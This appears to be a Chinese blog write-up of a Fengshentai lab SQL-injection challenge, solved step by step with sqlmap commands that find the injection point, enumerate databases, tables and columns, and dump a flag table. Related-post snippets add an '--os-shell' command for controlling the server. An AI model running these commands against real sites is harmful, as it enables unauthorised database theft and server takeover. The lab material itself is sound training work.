封神台sqlmap尝鲜题

最新推荐文章于 2024-06-28 18:10:49 发布
最新推荐文章于 2024-06-28 18:10:49 发布
阅读量429 收藏 3
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76206334/article/details/137379034
版权

我用的get传参

1.测试是否存在注入

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --batch

发现注入点

2.查询当前数据库

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -current-db --batch

3.接着我们爆库名

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --dbs

4.然后爆当前库的表名

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" --tables --batch

发现一个flag表

5.继续爆字段

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" --columns --batch

OK啊 看到flag了 最后我们读一下字段内容

6.字段

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" -C "flag" --dump --batch

林子汐•
关注
sqlmap1.6.5新版本
07-24
Sqlmap是著名的自动化SQL注入工具,它主要用于检测和利用网站应用程序中的SQL注入漏洞。Sqlmap1.6.5是该工具的一个新版本,其更新可能包括性能提升、新功能添加、已知问修复以及对更多数据库类型的兼容性增强。在...
sqlmap的使用 (以神台目为例)
yangtailang94666的博客
10-11 1381
一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL --data=DATA 数据字符串通过POST发送 --cookie=COOKIE HTTP Cookie的值 ...
sqlmap练习
m0_58265086的博客
08-27 153
1.输入sqlmap打开软件2. 获取数据库cms中对应表3.获取cms中cms_users表下对应的列名4.获得管理员密码输入:sqlmap.py -u"http://10.9.75.31/cms/show.php?
神台靶场SQL注入——SQLmap简单使用
m0_72592923的博客
01-13 1137
神台靶场SQL注入——SQLmap简单使用
注入(一)
tomyyyyy
06-28 304
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台的一次SQL注入靶场渗透测试
人若无名,便可专心练剑
06-28 728
这个目总的来讲还是蛮中规中矩的,没有对什么关键字进行过滤啥的,但是这里我后面尝试使用sqlmap跑,跑了很久,应该是这个网站对大量流量有个限制啥的,师傅们可以尝试下。这篇文章写出来的WP并不是主要是这道目,而是给大家讲下做这道目的一个思路以及实战中的一些注意事项什么的。最后希望能对师傅们有点帮助,嘿嘿嘿!!!
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL注入漏洞,并能够进一步利用这些漏洞进行数据库的控制和数据的提取。标"sqlmap-master"暗示了我们讨论...
SQLMAP源文件下载
最新发布
09-22
SQLMAP
SQLMAP Windows
02-23
SQLMAP是一款著名的自动化SQL注入工具,专用于检测和利用网站应用程序中的SQL注入漏洞。它可以在Windows操作系统上运行,为安全研究人员和渗透测试人员提供了一种高效且强大的手段来测试目标系统的安全性。 在...
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
SQLMAP使用实战测试
06-12
对于SQLmap的使用教程,挺实用的,详细可能差不多
浅试sqlmap
qq_51429150的博客
03-02 4532
sqlmap的工具初试,之后也会去试其他的渗透工具,但技术有限,对于很多工具只能是一边实践一边加深理解,写博客也只是看看自己的学习记录。 sql注入的目来自于神台 这个目本身并不复杂,是一很基础的sql注入,也正好用于我对sqlmap的入手。 点击传送门,导航栏上显示的url为“http://rhiq8003.ia.aqlab.cn/?id=1” 打开本地sqlmap, 执行语句:sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" .
尤里的复仇II 回归
sparename的博客
09-09 911
尤里的复仇II 归来sqlmap尝鲜sql-注入绕过防护getshell sqlmap尝鲜 Tips: 在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松…… 很简单的啦,一跑就出来啦 传送门 sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --os-shell//控制目标服务器 sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=c
SQL注入型(手工注入+sqlmap
我了解豹女就像农民伯伯了解大米
06-27 1386
目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入) 用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union) 发现并没有要找的数据,回归目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 首先进行手工注入(用’以及and或者or来进行查看是否可以
神台】SQL注入靶场练习(sqlmap
00勇士王子的博客
11-01 1万+
靶场地址 https://hack.zkaq.cn 目 解过程 1.进入目 2.只有个 点击查看新闻,点击进入 3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍 查询数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs 因为我们需要获得管理员密码,所以要查maoshe数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tabl
尤里的复仇II 回归【7
feiniaotjx的博客
10-23 2974
尤里的复仇II 回归【7】渗透第一步-信息收集 1渗透第一步-信息收集 2基础环境搭建sqlmap尝鲜 渗透第一步-信息收集 1 扫目录,但是要从files目录扫,(看了wp才知到) http://oovw8022.ia.aqlab.cn:8022/caidian/files/ 渗透第一步-信息收集 2 这个cms在网上搜了,没有找到,应该是迷惑我们的 看使用说明得知是海熊cms 查询到了cms,就可以在网上找payload了(也可以自己测试),手动无果,再用sqlmap 得到数据库 得表 得字段
owasp漏洞常见基础安全面试--SQL注入、sqlmap常见命令
ouyang_ly的博客
09-09 3828
SQL注入常见面试: 原理:攻击者将sql语句插入到网站的参数或链接中,从而恶意查询数据库的敏感信息。 SQL注入的数据类型:数字型、字符型、搜索型。 SQL注入的方式/方法:盲注、报错注入、布尔注入、宽字节注入。 数据库版本在5.0以上或以下有什么注入区别:5.0以下直接暴力查询,5.0以上通过 ...
神台-掌控者新靶场 - Kali系列4
热门推荐
weixin_43821278的博客
03-11 1万+
新靶场 - Kali系列【4】 Kali渗透 - Sqlmap实操靶场
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值